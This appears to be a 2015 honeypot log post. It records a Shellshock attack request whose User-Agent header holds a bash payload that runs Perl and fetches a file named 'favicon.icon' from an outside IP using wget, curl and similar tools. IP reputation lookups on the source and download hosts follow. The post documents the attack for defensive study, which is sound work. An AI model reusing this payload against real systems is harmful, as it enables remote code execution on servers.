Montag, 31. August 2015

Perl favicon.icon Download attempt - 211.144.37.41


BEGIN OF HTTP DATA:
2015-08-30 15:49:21
Source IP: 211.144.37.41
Country: CN RiskScore: 10 Malware: []
GET /phppath/cgi_wrapper HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://46.38.251.16/favi
con.icon;curl http://46.38.251.16/favicon.icon;GET http://46.38.251.16/favicon.icon;lwp-download http://46.38.251.16/favicon.i
con;lynx http://46.38.251.16/favicon.icon ");'
Host: 195.169.125.87
Connection: Close
Sadly I get a connection refused by the server, so I am unable to get the specified file.

The source IP
Blacklist StatusBLACKLISTED 13/40
IP Address211.144.37.41 ( Websites Lookup )
Reverse DNSUnknown
ASNAS9811
ASN Ownersrit corp.,beijing.
ISPChina Network Information Center
ContinentAsia

The download IP
Blacklist StatusPOSSIBLY SAFE 0/40
IP Address46.38.251.16 ( Websites Lookup )
Reverse DNSv220100240662590.yourvserver.net
ASNAS197540
ASN Ownernetcup GmbH
ISPnetcup GmbH
ContinentEurope

IBM XForce data for 211.144.37.41
"cats": {
      "Anonymisation Services": 86,
      "Spam": 100
   },
   "geo": {
      "country": "China",
      "countrycode": "CN"
   },